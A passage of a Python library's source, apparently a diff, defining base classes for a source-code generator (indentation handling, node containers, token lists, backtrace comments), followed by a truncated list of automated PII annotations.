:class:`EnsureNode`: descriptor used to build attributes that guarantee that they contain an instance of NodeABC. +* :class:`DelegatedAttribute`: descriptor used to delegate an attribute to another instance which has the given attribute name. +* :class:`NodeViewBase`: base class for class representing a view of another node (for example a variable declaration is a view of a variable). +* :class:`PhantomNode`: class which can be used as an empty placeholder when a node is required. +* :class:`NodeContainerBase`: base class for node containers. It mostly implements operator overloading. +* :class:`TokenListABC`: abstract base class for token lists. This is a node that can contain a list of any object that can be used as a string, and concatenate them when printed. +* :class:`DelegatedTokenListBase`: base class for a token list that uses a specific attribute to really hold the token list instance (thus implementing composition instead of inheritance). +* :class:`TokenListBase`: base class for a token list. +* :class:`IndentedTokenListBase`: base class for a token list which indents it content when printed. +* :class:`IndentedDelegatedTokenListBase`: mix of :class:`IndentedTokenListBase` and :class:`DelegatedTokenListBase`. +* :class:`BacktraceBase`: base class for special token list that output a simplified backtrace of Python code that was used to build the instance. Useful when trying to debug the code generator. + +"""""" + + +import collections +import numbers +import abc +import inspect +import copy +import functools +import os + + +def listify(iterable_or_single_elem): + """"""Create a list out of: + + * an iterable object: the result will be like ``list(iterable_or_single_elem)`` + * a object which cannot be iterated over: return a list with only one item (just the object) + * an object which is iterable, but also a subclass of :class:`NonIterable`: + return a list with just the object, as if it was not iterable. + """""" + if iterable_or_single_elem is None: + return [] + # We exclude iterables such as strings or NonIterable (StmtContainer for example) + # because we want to keep them as one object and not split them + if isinstance(iterable_or_single_elem, collections.Iterable) \ + and not isinstance(iterable_or_single_elem, (str, NonIterable)): + return list(iterable_or_single_elem) + else: + return [iterable_or_single_elem] + +def format_string(string, style, separator=""_""): + """""" Format a string according to a convention. + + It is can be used to write identfiers name in a unified format before applying a naming convention. + + :param string: the string to be modified. It must be in a format where the word sperator is always the same. + :param style: the convention. It can be one of: + + * UpperCamelCase + * lowerCamelCase + * lower_underscore_case + * UPPER_UNDERSCORE_CASE + :param separator: the word separator used to split the words appart before applying the convention. + It defaults to '_'. + """""" + if isinstance(string, collections.Iterable) and not isinstance(string, (str, NonIterable)): + token_list = string + else: + token_list = str(string).split(separator) + # If there is only one token in the list and in case it is an empty + # string, we dont want to replace it with a _ + if len(token_list) != 1: + for i, token in enumerate(token_list): + if not token: + token_list[i] = separator + + if style == ""UpperCamelCase"": + return """".join(token.capitalize() for token in token_list) + + if style == ""lowerCamelCase"": + first_word = token_list[0].lower() + remain_list = token_list[1:] + return first_word+"""".join(token.capitalize() for token in remain_list) + + if style == ""lower_underscore_case"": + return ""_"".join(token.lower() for token in token_list) + + if style == ""UPPER_UNDERSCORE_CASE"": + return ""_"".join(token.upper() for token in token_list) + +def strip_starting_blank_lines(snippet): + """"""Strip blank lines at the beginning of a multiline string."""""" + + last_new_line_pos = 0 + for position, char in enumerate(snippet): + if char=='\n': + last_new_line_pos = position + elif char!='\t' and char!=' ' and char!='\v': + break + # Only keep one new line at the beginning, to avoid multiple blank lines + return snippet[last_new_line_pos:] + +class Indentation: + """"""This class manages the indentation in the source code output. + + Instances can be printed to give the string to put at the beginning of a new indented line. + + >>> idt = Indentation() + >>> idt.indent() + >>> print('*'+str(idt)+'indented Hello World') + * indented Hello World + """""" + + # Default indentation style (4 spaces) + indentation_string = ' ' + + @classmethod + def ensure_idt(cls, idt): + """"""Create a new indentation instance if *idt* is None, + or return *idt* if it is already an :class:`Indentation` instance. + """""" + if idt is None: + idt = cls() + elif isinstance(idt, numbers.Integral): + idt = cls(idt) + elif isinstance(idt, str): + idt = cls(indentator=idt) + return idt + + + def __init__(self, level=0, indentator=None): + """""" + :param level: the initial indentation level + :type level: int + :param indentator: the string used to display indentation. + It defaults to the class attribute *indentation_string* which is four spaces. + """""" + self.indentation_level = level + # If an indentation is string is given, override the classwide default with + # an instance-local string + if indentator is not None: + self.indentation_string = indentator + + def indent(self, level=1): + """"""Increase the indentation level by *level* levels."""""" + self.indentation_level += level + + def dedent(self, level=1): + """"""Decrease the indentation level by *level* levels."""""" + self.indentation_level -= level + + def __str__(self): + """"""Return the string to be used at the beginning of a line to display the indentation."""""" + return self.indentation_string * self.indentation_level + + +class NonIterable: + """""" Inheriting from this class will prevent a class to be considered as + :class:`collections.Iterable` by :func:`listify`. + """""" + pass + +class NodeMeta(abc.ABCMeta): + """"""Meta class used for every node, i.e. every class representing source code constructs. + + Currently, it only does a bit of black magic on :meth:`NodeABC.inline_str` and :meth:`NodeABC.self_inline_str` methods: + it creates a wrapper around them that calls *inline_str_filter* if it exists on their return string, to + let the user apply some naming convention at the latest stage. + """""" + def __new__(meta, name, bases, dct): + # Add automatic 'inheritance' for __format_string class attribute + attr_name = '_'+name+'__format_string' + if bases and not attr_name in dct: + try: + dct[attr_name] = bases[0].__dict__['_'+bases[0].__name__+'__format_string'] + except KeyError: + pass + + # Wrap inline_str function to allow automatic filtering on its output + def make_wrapper(wrapped_fun): + @functools.wraps(wrapped_fun) + def wrapper_fun(self, *args, **kwargs): + result = wrapped_fun(self, *args, **kwargs) + try: + filter_fun = self.inline_str_filter + except AttributeError: + # Just return the string as is, no filter hook is installed + return result + else: + # Call the filter on the resulting string + return filter_fun(result) + + return wrapper_fun + + for stringify_fun_name in ['inline_str', 'self_inline_str']: + if stringify_fun_name in dct: + wrapped_fun = dct[stringify_fun_name] + dct[stringify_fun_name] = make_wrapper(wrapped_fun) + + return super().__new__(meta, name, bases, dct) + +class NodeABC(metaclass=NodeMeta): + """"""This class is an Abstract Base Class describing the most basic API evey node should conform to."""""" + __format_string = '' + + @abc.abstractmethod + def inline_str(self, idt=None): + """"""This function is called to print the content of the node in an inline context. + + This can be for example when the node is printed inside an expression. + This function should not try to print a preceding new line or indentation string. + """""" + + pass + @abc.abstractmethod + def freestanding_str(self, idt=None): + """"""This function is called to print the content of the node in a freestanding context. + + This can be for example when the node is printed in directly in the source file. + This function should print the preceding new line and indentation if the source code constructs + requires it. + """""" + pass + + @abc.abstractmethod + def adopt_node(self, child): + pass + +class NodeAttrProxy(NodeABC): + """"""This class is a proxy that redirects calls to the :class:`NodeABC` API to a given + attribute of a given instance. + + It creates stubs that allows transparent composition for the most limited subset of the APIs + provided by this library to avoid getting into crazy things. + This class should really be used when this enable to factor lots of code. A design based on + hooks implemented in subclasses called by a base class is preferable in most case where you + would be tempted to use this proxy. + """""" + def __init__(self, obj, attr_name): + self.obj = obj + self.attr_name = attr_name + + def inline_str(self, idt=None): + return getattr(self.obj, self.attr_name).inline_str(idt) + + def freestanding_str(self, idt=None): + return getattr(self.obj, self.attr_name).freestanding_str(idt) + + def adopt_node(self, child): + return getattr(self.obj, self.attr_name).adopt_node(child) + +class EnsureNode: + """"""This class is a descriptor that makes sure that the attribute that uses it holds a reference + to an instance of one of the classes given in *node_classinfo*. + + When set, this descriptor check if the given object is indeed an instance of *node_classinfo* classes. + If not, it calls *node_factory* to build an object and store its return value. Therefore, + the content of the attribute using this descriptor is always some instance of the classes + contained in *node_classinfo*. This descriptor is used as a gatekeeper to be able to make some assumptions + on the type of data hold by the attribute. + + .. note:: The *node_classinfo* always contains the class :class:`NodeABC`. + """""" + def __init__(self, storage_attr_name, node_factory, node_classinfo=()): + """""" + :param storage_attr_name: the underlying attribute used to store the object. + :param node_factory: the factory called when someone tries to store a non :class:`NodeABC` inside the attribute. + :param node_classinfo: this is a tuple that containes classes. + The value stored in the attribute is checked against this tuple using :func:`isinstance` to + determine if the factory should be used. This always contains at least :class:`NodeABC` + """""" + self.storage_attr_name = storage_attr_name + self.node_factory = node_factory + + node_classinfo = listify(node_classinfo)+[NodeABC] + if inspect.isclass(self.node_factory): + node_classinfo.append(self.node_factory) + node_classinfo = tuple(node_classinfo) + + self.node_classinfo = node_classinfo + + def __get__(self, instance, owner): + if instance is not None: + return instance.__dict__[self.storage_attr_name] + # If the descriptor is called as a class attribute, it + # just returns itself, to allow the world to see that it + # is a descriptor + else: + return self + + def __set__(self, instance, value): + if not isinstance(value, self.node_classinfo): + value = self.node_factory(value) + instance.__dict__[self.storage_attr_name] = value + +class NodeBase(NodeABC): + """"""This class is the base classes of most nodes. + + It provides some default implementations for methods of :class:`NodeABC`. + """""" + @classmethod + def ensure_node(cls, obj, factory=None): + """"""Ensure that the given object *obj* is an instance of the class this method is called from or of :class:`NodeABC` + , and if not, tries to build a node from it using the class this class method is called from or *factory*. + + .. note:: You should better use the :class:`EnsureNode` descriptor when possible, instead of making a use of + this class method. + + .. warning:: Not every class supports to be called whith only one parameter, so a call to this + class method is note is not guaranteed to succeed. + + + :param obj: the object to build a node from. + :param factory: an optional factory used to build the node from *obj*. If not provided, the class this + method is called from is called whith *obj* as first and only parameter. + """""" + + if isinstance(obj, (cls, NodeABC)): + return obj + else: + if factory is not None: + return factory(obj) + else: + return cls(obj) + + def __init__(self, comment=None, side_comment=None, parent=None): + """""" All of the paramaters should be used as keyword arguments, because they are forwarded from + the children classes and the order at the arrival is not guaranteed. + + :param comment: a comment node that will be printed next to the current node when the source code of + the node is generated. Usually, it is a block comment printed before the node + in languages that supports them. This comment is printed by the containers such as + :class:`NodeContainerBase`, so it does not require any support from the class. + + :param side_comment: a comment that will be printed just by the current node when the source code of + the node is generated. Usually, it is a one line comment, printed right to the + node. Be aware that this parameter is used by the class in whatever way it wants to, + and there is no guarantee it will be printed at all. + """""" + + # Should be EnsureNode descriptors with factory using phantom_node when given None in derived classes + self.comment = comment + # Should be EnsureNode descriptors with factory using phantom_node when given None in derived classes + self.side_comment = side_comment + + # We dont use try: ... except: to avoid catching exceptions + # occuring inside adopt_node call + if parent is not None: + if hasattr(parent, 'adopt_node'): + parent.adopt_node(self) + else: + raise NotImplementedError(""The given parent does not support child adoption"") + + + def freestanding_str(self, idt=None): + """"""See :class:`NodeABC` for the role of this function. + + This implementation just calls *inline_str* and prepends a new line and indentation string. + """""" + idt = Indentation.ensure_idt(idt) + snippet = self.inline_str(idt) + # Do not output anything if the string is empty + if snippet: + return '\n'+str(idt)+snippet + else: + return '' + + def __str__(self, idt=None): + """"""This implementation tries to print the node by probing the object for some methods: + + 1. *decl()*: it is usually used to return a :class:`NodeViewBase` corresponding to the declaration of the node + 2. *defi()*: it is usually used to return a :class:`NodeViewBase` corresponding to the definition of the node + 3. *freestanding_str()*: see :class:`NodeABC` + """""" + # We dont use try: ... except: to avoid catching exceptions + # occuring inside freestanding_str call + + # Try to display a declaration + if hasattr(self, 'decl'): + self_decl = self.decl() + if isinstance(self_decl, NodeABC): + return self_decl.freestanding_str(idt) + # Or a definition + elif hasattr(self, 'defi'): + self_defi = self.defi() + if isinstance(self_defi, NodeABC): + return self_defi.freestanding_str(idt) + + else: + return self.freestanding_str(idt) + + def adopt_node(self, child): + self.append(child) + + +class DelegatedAttribute: + """"""This class is a descriptor that allows an object to use the value of that attribute of another instance. + + For example, the comment attribute of a parent node of a :class:`NodeViewBase` instance is used as the comment + attribute of the :class:`NodeViewBase` instance if the comment attribute was not explicitly set on the + :class:`NodeViewBase` instance. When that attribute is set, it uses its own object instead of refering to its parent + one. + """""" + def __init__(self, attr_name, delegated_to_attr_name, descriptor=None, default_value_list=tuple()): + """""" + :param attr_name: the name of the attribute to manage. + :param delegated_to_attr_name: the name of the attribute holding a reference to the other instance also + holding an *attr_name* attribute. + :param descriptor: a descriptor class, in case the attribute should be managed through a descriptor. + This allows basic descriptor chaining. + :param default_value_list: a list of default values that does not trigger the switch to the local attribute. + For example, if a class set by default a *comment* attribute to None, the attribute + look up should still be made in the other instance. That way, it allows some placeholder + value to be set, without altering the intended behavior. + """""" + self.attr_name = attr_name + self.delegated_to_attr_name = delegated_to_attr_name + self.descriptor = descriptor + self.default_value_list = default_value_list + + def __get__(self, instance, owner): + if instance is not None: + # If the attribute has been set on the instance, just get it + if instance.__dict__.get('__'+self.attr_name+'_is_set', False): + if self.descriptor is not None: + return self.descriptor.__get__(instance, owner) + else: + return instance.__dict__[self.attr_name] + + # Else it means that the attribute has not been set, + # so we delegate to the parent + else: + parent = getattr(instance, self.delegated_to_attr_name) + return getattr(parent, self.attr_name) + + # If the descriptor is called as a class attribute, it + # just returns itself, to allow the world to see that it + # is a descriptor + else: + return self + + def __set__(self, instance, value): + if self.descriptor is not None: + self.descriptor.__set__(instance, value) + else: + instance.__dict__[self.attr_name] = value + + # If the value is one of the default_value_list, do not consider that the attribute was + # set. This allows some code in base classes to set the attribute to None + # by default, and still get the parent's attribute when it is the case + if value not in self.default_value_list: + instance.__dict__['__'+self.attr_name+'_is_set'] = True + + +class NodeViewBase(NodeBase): + """"""This is the base class of the node that are view of other node. + + For example, a variable declaration is a view of the variable, as it only displays + informations already contained in the variable object. + View nodes should store the reference of their parent in a *parent* attribute. + """""" + def __init__(self, parent, *args, **kwargs): + self.parent = parent + super().__init__(*args, **kwargs) + + def __eq__(self, other): + """"""implementation of the equality test between two views: + it tests to see if they have the same parent and if the two view + are of the exact same type. + """""" + return type(self) is type(other) and self.parent is other.parent + + + +class PhantomNode(NodeBase): + """"""This class is a node that will be printed as an empty string. + + This is intended to be used as a placeholder when a :class:`NodeABC` instance is required. + """""" + # PhantomNode must not call Node.__init__ because it causes infinite + # recursion when built from Node.__init__ + def __init__(self, *args, **kwargs): + self.parent = self + self.comment = self + self.side_comment = self + + def inline_str(self, idt=None): + return '' + + freestanding_str = inline_str + +# Instance used everywhere, instead of creating billions of identical PhantomNode +PHANTOM_NODE = PhantomNode() + + +class NodeContainerBase(NodeBase, collections.MutableSequence, NonIterable): + """"""This is the base class of all the nodes that contains a list of other nodes. + + It implements all the logic for operators overloading, and printing the nodes that it takes care of. + It also derives from the :class:`collections.MutableSequence` abstract base class, so it behaves + like a list. The only exception is when given to :func:`listify`, it remains as a single object, because + it also derives from :class:`NonIterable`. This is intended to allow the user to add nodes to it later, + and the result should be taken into account by the consumer that used :func:`listify` on it. If it was not the case, + the consumer using :func:`listify` would end up with a list of nodes frozen at the time :func:`listify` is called. + + The other important aspect of this class is that it can guarantee the type of the contained nodes, even when + overloaded operators like *+=* are used. See the *node_classinfo* and *node_factory* constructor arguments. + """""" + + default_node_classinfo = (NodeABC,) + + def __init__(self, node_list=None, node_classinfo=None, node_factory=None, *args, **kwargs): + """""" + :param node_list: the list of nodes that the container contains + :param node_classinfo: a tuple of classes used to check the nodes that enters the container. + If a node is not an instance of one of the *node_classinfo* classes, it is + passed to *node_factory*. All of the classes in *node_classinfo* must be + subclasses of :class:`NodeABC`. + :param node_factory: a factory used when an object which is not an instance of one of the classes of + *node_classinfo* tries to enter the container. The return value of this factory + is then allowed inside. + """""" + node_classinfo_tuple = tuple(listify(node_classinfo)) + for classinfo in node_classinfo_tuple: + if not issubclass(classinfo, NodeABC): + raise ValueError('node_classinfo must be a subclass of NodeABC') + + node_list = listify(node_list) + + if node_classinfo is None: + self.node_classinfo = self.default_node_classinfo + else: + self.node_classinfo = node_classinfo_tuple + + if node_factory is None: + # If the node_classinfo is None, then self.node_classinfo contains default_node_classinfo + # which is only composed of NodeABC, and therefore cannot be used as a factory + if node_classinfo is None: + raise ValueError( + 'You must specify a node factory or give a class that can be used as a factory as first item of node_classinfo' + ) + + # The first element in the tuple is taken as the factory + node_factory = self.node_classinfo[0] + + # A wrapper to make sure that the output of the node_factory is + # indeed a NodeABC + def make_node_factory_wrapper(factory): + def wrapper(node): + result = factory(node) + if not isinstance(result, NodeABC): + raise ValueError(""The node factory did not give a NodeABC"") + else: + return result + return wrapper + + self.node_factory = make_node_factory_wrapper(node_factory) + + self.node_list = [ + item if isinstance(item, self.node_classinfo) else self.node_factory(item) + for item in node_list + ] + super().__init__(*args, **kwargs) + + def inline_str(self, idt=None): + """"""Print all the contained nodes using their *freestanding_str* method, + because a container is a freestanding context. + It also strips the blank lines at the beginning. + """""" + snippet = """" + for node in self.node_list: + if hasattr(node, 'comment'): + snippet += node.comment.freestanding_str(idt) + snippet += node.freestanding_str(idt) + + return strip_starting_blank_lines(snippet) + + def freestanding_str(self, idt=None): + """"""Calls super().freestanding_str, and strip the blank lines + at the beginning. + """""" + snippet = super().freestanding_str(idt) + return strip_starting_blank_lines(snippet) + + def __copy__(self): + cls = type(self) + new_obj = cls.__new__(cls) + new_obj.__dict__.update(self.__dict__) + new_obj.node_list = copy.copy(self.node_list) + new_obj.node_classinfo = copy.copy(self.node_classinfo) + new_obj.node_factory = copy.copy(self.node_factory) + return new_obj + + def clear(self): + # We preserve the object's itself, we do not build a new one + self[:] = [] + + def insert(self, index, value): + elem_list = listify(value) + for i, elem in enumerate(elem_list): + if not isinstance(elem, self.node_classinfo): + elem = self.node_factory(elem) + self.node_list.insert(index+i, elem) + + + def index(self, *args, **kwargs): + return self.node_list.index(*args, **kwargs) + + def count(self, *args, **kwargs): + return self.node_list.count(*args, **kwargs) + + def pop(self, *args, **kwargs): + return self.node_list.pop(*args, **kwargs) + + def reverse(self): + self.node_list.reverse() + + def remove(self, *args, **kwargs): + self.node_list.remove(*args, **kwargs) + + @abc.abstractmethod + def __add__(self, other): + return type(self)((self, other)) + + @abc.abstractmethod + def __radd__(self, other): + return type(self)((other, self)) + + def __iadd__(self, other): + other_list = listify(other) + typed_other_list = [ + item if isinstance(item, self.node_classinfo) else self.node_factory(item) + for item in other_list + ] + self.node_list.extend(typed_other_list) + return self + + def append(self, other): + self.__iadd__(other) + + def extend(self, other_list): + other_list = listify(other_list) + for other in other_list: + self.append(other) + + def __mul__(self, other): + if isinstance(other, numbers.Integral): + self_copy = copy.copy(self) + self_copy.node_list = self.node_list * other + return self_copy + else: + return NotImplemented + + def __rmul__(self, other): + return self.__mul__(other) + + def __imul__(self, other): + if isinstance(other, numbers.Integral): + self.node_list *= other + return self + else: + return NotImplemented + + def __contains__(self, item): + return item in self.node_list + + def __reversed__(self): + return reversed(self.node_list) + + def __getitem__(self, key): + return self.node_list[key] + + def __setitem__(self, key, value): + if not isinstance(value, self.node_classinfo): + value = self.node_factory(value) + + self.node_list[key] = value + + def __delitem__(self, key): + del self.node_list[key] + + def __len__(self): + return len(self.node_list) + + def __iter__(self): + return iter(self.node_list) + + +class TokenListABC(NodeBase, NonIterable, collections.MutableSequence): + """"""This class is an abstract base class for all classes that are token lists. + + A token list is an object that holds a sequence of tokens, which get concatenated when printed. + The tokens are turned into strings only when the token list is printed, which is why it is + the lazy building blocks of source code constructs like expressions and many others. + + Whan printed, the token list should call *inline_str* on its tokens if the token is a :class:`NodeABC`, + or the builtin :func:`str` otherwise. + """""" + pass + +class DelegatedTokenListBase(TokenListABC): + """"""This is the base class for token lists classes that forward the calls to the :class:`TokenListABC` API + to an attribute. + + This class implements stubs to allow transparent object composition. + """""" + @property + def tokenlist_attr(self): + """"""This property gives the attribute holding the real token list."""""" + + attr = getattr(self, self.tokenlist_attr_name) + if not isinstance(attr, TokenListABC): + raise AttributeError('The attribute '+self.tokenlist_attr_name+' is not a TokenListABC') + else: + return attr + + @tokenlist_attr.setter + def tokenlist_attr(self, value): + return setattr(self, self.tokenlist_attr_name, value) + + def __init__(self, tokenlist_attr_name, *args, **kwargs): + """""" + :param tokenlist_attr_name: the name of the attribute holding the real token list + """""" + + self.tokenlist_attr_name = tokenlist_attr_name + super().__init__(*args, **kwargs) + + def inline_str(self, idt=None): + return self.tokenlist_attr.inline_str(idt) + + def freestanding_str(self, idt=None): + return self.tokenlist_attr.freestanding_str(idt) + + def index(self, *args, **kwargs): + return self.tokenlist_attr.index(*args, **kwargs) + + def insert(self, *args, **kwargs): + return self.tokenlist_attr.insert(*args, **kwargs) + + def index(self, *args, **kwargs): + return self.tokenlist_attr.index(*args, **kwargs) + + def count(self, *args, **kwargs): + return self.tokenlist_attr.count(*args, **kwargs) + + def pop(self, *args, **kwargs): + return self.tokenlist_attr.pop(*args, **kwargs) + + def reverse(self): + self.tokenlist_attr.reverse() + + def remove(self, *args, **kwargs): + self.tokenlist_attr.remove(*args, **kwargs) + + def __add__(self, other): + self_copy = copy.copy(self) + self_copy.tokenlist_attr = self_copy.tokenlist_attr.__add__(other) + return self_copy + + def __radd__(self, other): + self_copy = copy.copy(self) + self_copy.tokenlist_attr = self_copy.tokenlist_attr.__radd__(other) + return self_copy + + def append(self, other): + self.tokenlist_attr.append(other) + + def __iadd__(self, *args, **kwargs): + self.tokenlist_attr.__iadd__(*args, **kwargs) + return self + + def extend(self, other_list): + self.tokenlist_attr.extend(other_list) + + def __mul__(self, other): + self_copy = copy.copy(self) + self_copy.tokenlist_attr = self_copy.tokenlist_attr.__mul__(other) + return self_copy + + + def __rmul__(self, *args, **kwargs): + self_copy = copy.copy(self) + self_copy.tokenlist_attr = self_copy.tokenlist_attr.__rmul__(*args, **kwargs) + return self_copy + + + def __imul__(self, other): + self.tokenlist_attr.__imul__(other) + return self + + def __contains__(self, *args, **kwargs): + return self.tokenlist_attr.__contains__(*args, **kwargs) + + def __iter__(self): + return self.tokenlist_attr.__iter__() + + def __reversed__(self): + return self.tokenlist_attr.__reversed__() + + def __getitem__(self, key): + return self.tokenlist_attr.__getitem__(key) + + def __setitem__(self, key, value): + self.tokenlist_attr.__setitem__(key, value) + + def __delitem__(self, key): + self.tokenlist_attr.__delitem__(key) + + def __len__(self): + return self.tokenlist_attr.__len__() + + +class TokenListBase(TokenListABC): + """"""This base class implements the :class:`TokenListABC` API with all of the operators overloading logic. + """""" + def __init__(self, token_list=None, *args, **kwargs): + """""" + :param token_list: the list of tokens to store inside the token list + """""" + self._token_list = listify(token_list) + super().__init__(*args, **kwargs) + + def inline_str(self, idt=None): + """"""Print the tokens of the token list usin, and concatenate all the strings. + + If the token is a :class:`NodeABC`, its *inline_str* method is used. + otherwise, :func:`str` builtin is called on the token. + """""" + string = '' + for token in self._token_list: + if token is self: + # Special handling of self: allows to print itself using + # a different method to avoid infinite recursion and to provide + # a mean to subclasses to implement self printing without creating a + # ""self-printer"" class dedicated to printing themselves + string += self.self_inline_str(idt) + elif isinstance(token, NodeABC): + string += token.inline_str(idt) + else: + string += str(token) + + return string + + def index(self, *args, **kwargs): + return self._token_list.index(*args, **kwargs) + + def insert(self, *args, **kwargs): + return self._token_list.insert(*args, **kwargs) + + def index(self, *args, **kwargs): + return self._token_list.index(*args, **kwargs) + + def count(self, *args, **kwargs): + return self._token_list.count(*args, **kwargs) + + def pop(self, *args, **kwargs): + return self._token_list.pop(*args, **kwargs) + + def reverse(self): + self._token_list.reverse() + + def remove(self, *args, **kwargs): + self._token_list.remove(*args, **kwargs) + + def __add__(self, other): + if isinstance(other, TokenListABC): + other_list = list(other) + self_copy = copy.copy(self) + self_copy._token_list = self._token_list+other_list + return self_copy + # The result of the addition with a NodeContainer is a NodeContainer + elif isinstance(other, NodeContainerBase): + return other.__radd__(self) + else: + other_list = listify(other) + self_copy = copy.copy(self) + self_copy._token_list = self._token_list+other_list + return self_copy + + def __radd__(self, other): + other_list = listify(other) + self_copy = copy.copy(self) + self_copy._token_list = other_list+self._token_list + return self_copy + + def append(self, other): + if isinstance(other, TokenListABC): + other_list = tuple(other) + else: + other_list = listify(other) + + self._token_list.extend(other_list) + return self + + def __iadd__(self, *args, **kwargs): + self.append(*args, **kwargs) + return self + + def extend(self, other_list): + other_list = listify(other_list) + for other in other_list: + self.append(other) + + def __mul__(self, other): + if isinstance(other, numbers.Integral): + self_copy = copy.copy(self) + self_copy._token_list = self._token_list * other + return self_copy + else: + return NotImplemented + + def __rmul__(self, *args, **kwargs): + return self.__mul__(*args, **kwargs) + + def __imul__(self, other): + if isinstance(other, numbers.Integral): + self._token_list *= other + return self + else: + return NotImplemented + + def __contains__(self, *args, **kwargs): + return self._token_list.__contains__(*args, **kwargs) + + def __iter__(self): + return iter(self._token_list) + + def __reversed__(self): + return reversed(self._token_list) + + def __getitem__(self, key): + return self._token_list[key] + + def __setitem__(self, key, value): + self._token_list[key] = value + + def __delitem__(self, key): + del self._token_list[key] + + def __len__(self): + return len(self._token_list) + + +class _IndentedTokenListBase: + """"""This class is the base class that implements a token list which indents its content when printed."""""" + def inline_str(self, idt=None): + idt = Indentation.ensure_idt(idt) + + snippet = super().inline_str(idt) + indented_new_line = ""\n""+str(idt) + snippet = snippet.replace(""\n"", indented_new_line) + return snippet + +class IndentedTokenListBase(_IndentedTokenListBase, TokenListBase): + """"""This class is a base class for token lists that indent their content when printed."""""" + pass + +class IndentedDelegatedTokenListBase(_IndentedTokenListBase, DelegatedTokenListBase): + """"""This is a mix between :class:`DelegatedTokenListBase` and :class:`IndentedTokenListBase`."""""" + pass + +class BacktraceBase(TokenListBase, NonIterable, metaclass=abc.ABCMeta): + """"""This base class allows the instances to record the backtrace of the Python code that + created them. + + This allows one to add comments in generated source code showing which file and line of the Python + script was responsible for creating it. This is a facility when debugging the source code generator, + and can avoid headache when ones want to track down which line of Python generated which line of + generated source code. + As a convenience, it is a subclass of :class:`TokenListBase` so it can be used inside a comment for example. + """""" + __frame_format_string = '{filename}:{lineno}({function})' + __frame_joiner = ', ' + + def __init__(self, level=0, *args, **kwargs): + stack = inspect.stack() + self.stack_frame_list = [ + frame[1:] for frame in stack + if os.path.dirname(frame[1]) != os.path.dirname(__file__) + ] + + super().__init__(self, *args, **kwargs) + + @abc.abstractmethod + def freestanding_str(self, idt=None): + #Construct a comment by giving itself as a token and use its freestanding_str method + pass + + def self_inline_str(self, idt=None): + return self.__frame_joiner.join( + self.__frame_format_string.format( + filename = os.path.relpath(frame[0]), + lineno = frame[1], + function = frame[2], + line_content = frame[3][frame[4]] if frame[3] is not None else '' + ) for frame in self.stack_frame_list + ) +",41613,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Douglas RAILLARD'], ['PERSON', 'Douglas RAILLARD'], ['PERSON', 'lower_underscore_case'], ['PERSON', ""bases[0].__dict__['_'+bases[0].__name__+'__format_string""], ['LOCATION', 'self.node_classinfo'], ['LOCATION', 'self.node_classinfo'], ['NRP', 'self.comment'], ['PERSON', 'decl'], ['PERSON', 'freestanding_str'], ['PERSON', 'decl'], ['LOCATION', 'self.descriptor.__set__(instance'], ['PERSON', 'freestanding_str = inline_str\n\n'], ['PERSON', 'default_node_classinfo ='], ['PERSON', ""ValueError('node_classinfo""], ['NRP', 'node_list'], ['LOCATION', 'self.node_classinfo'], ['LOCATION', 'self.node_classinfo'], ['LOCATION', 'isinstance(item'], ['LOCATION', 'self.node_classinfo'], ['LOCATION', 'self.node_classinfo'], ['PERSON', '@abc.abstractmethod'], ['PERSON', '@abc.abstractmethod'], ['LOCATION', 'isinstance(item'], ['LOCATION', 'self.node_classinfo'], ['NRP', 'self_copy.node_list'], ['LOCATION', 'self.node_classinfo'], ['PERSON', 'Whan'], ['PERSON', '@tokenlist_attr.setter\n def'], ['LOCATION', 'TokenListBase'], ['LOCATION', 'IndentedDelegatedTokenListBase(_IndentedTokenListBase'], ['PERSON', '@abc.abstractmethod'], ['PERSON', 'lineno ='], ['PERSON', 'line_content = frame[3][frame[4]'], ['URL', 'http://www.gnu.org/licenses/'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ':: '], ['URL', 'email.com'], ['URL', 'collections.It'], ['URL', 'collections.It'], ['URL', 'token.ca'], ['URL', 'token.ca'], ['URL', 'idt.in'], ['URL', 'numbers.Int'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'collections.It'], ['URL', 'NodeABC.in'], ['URL', 'NodeABC.se'], ['URL', 'self.in'], ['URL', 'self.at'], ['URL', 'self.at'], ['URL', 'self.at'], ['URL', 'self.at'], ['URL', 'self.st'], ['URL', 'self.no'], ['URL', 'inspect.is'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.st'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.st'], ['URL', 'self.com'], ['URL', 'self.si'], ['URL', 'parent.ad'], ['URL', 'self.in'], ['URL', 'self.de'], ['URL', 'decl.fr'], ['URL', 'self.de'], ['URL', 'defi.fr'], ['URL', 'self.fr'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'other.pa'], ['URL', 'self.pa'], ['URL', 'self.com'], ['URL', 'self.si'], ['URL', 'collections.Mu'], ['URL', 'collections.Mu'], ['URL', 'self.no'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'node.comment.fr'], ['URL', 'node.fr'], ['URL', 'obj.no'], ['URL', 'copy.co'], ['URL', 'self.no'], ['URL', 'obj.no'], ['URL', 'copy.co'], ['URL', 'self.no'], ['URL', 'obj.no'], ['URL', 'copy.co'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'list.in'], ['URL', 'self.no'], ['URL', 'list.in'], ['URL', 'self.no'], ['URL', 'list.co'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'list.re'], ['URL', 'self.no'], ['URL', 'list.re'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'numbers.Int'], ['URL', 'copy.co'], ['URL', 'copy.no'], ['URL', 'self.no'], ['URL', 'numbers.Int'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 